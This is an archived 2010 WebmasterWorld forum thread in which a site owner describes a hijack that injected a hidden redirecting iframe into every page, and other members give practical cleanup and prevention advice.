homepage Welcome to WebmasterWorld Guest from 54.205.228.154
register, free tools, login, search, subscribe, help, library, announcements, recent posts, open posts,
Subscribe to WebmasterWorld
Visit PubCon.com
Home / Forums Index / WebmasterWorld / Webmaster General
Forum Library, Charter, Moderators: phranque & physics

Webmaster General Forum

    
My Site was Hijacked
Hijackers added sniplet of encoded java code and took over
spaceylacie




msg:4077284
 11:01 pm on Feb 9, 2010 (gmt 0)

Despite what I was told by my host, a very popular, reputable company, I don't see how it could have been a password issue. The password is kept 100% secure and changed often.

The site is(well, was-it's dead now) interactive so members can upload their own content. People can leave comments. etc.

Anyway, what happened is a .com site, broke into my server and added an encrypted java script code to the footer of every page.

But de-coded it looks like this:
document.write('<ifra><iframe>'); -- Well, WebmasterWorld won't let me enter the code, but it's a one pixel by one pixel iframe that tries to re-direct people to an external size.

You can't search your files for it because it's encrypted! The above gibberish is taken from the encrypted code opened in notepad, so hopefully it can be found by doing an exact search. Any help with this would be appreciated. I'm more of a publisher than a techie but did manage to find out this much.

[edited by: phranque at 1:10 pm (utc) on Feb 11, 2010]
[edit reason] No urls, please. See TOS [webmasterworld.com] [/edit]

 

Demaestro




msg:4077292
 11:09 pm on Feb 9, 2010 (gmt 0)

There has been a lot of these reported lately, and 90% of the time it was because a computer you store passwords or use passwords from was compromised.

You should also look at the server's access file that does 404 and 500 error redirects to custom error page... you may find that they are now redirecting to the offending site as well.

Unplug all your personal/work computers from the network to avoid them doing more damage and scan them. Then from a confirmed uninfected computer change your server passwords.

Check this recent thread on the same issue for good info on how to proceed.

[webmasterworld.com...]

Leosghost




msg:4077296
 11:18 pm on Feb 9, 2010 (gmt 0)

Well, WebmasterWorld won't let me enter the code

Ask yourself why ..

spaceylacie




msg:4077325
 12:34 am on Feb 10, 2010 (gmt 0)

Thanks. Yeah, good reason I couldn't enter the code here.

I'm reading through the other topics about this now.

rocknbil




msg:4077368
 1:57 am on Feb 10, 2010 (gmt 0)

Also look through the posts on XSS and mySQL injection, another point of entry.

tangor




msg:4077390
 2:42 am on Feb 10, 2010 (gmt 0)

Sadly, these days, it appears that more website infections/hijacks are from programmer computers. NEVER use the same computer you develope/update a website with to do personal or company web surfing.

That simple.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / WebmasterWorld / Webmaster General
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved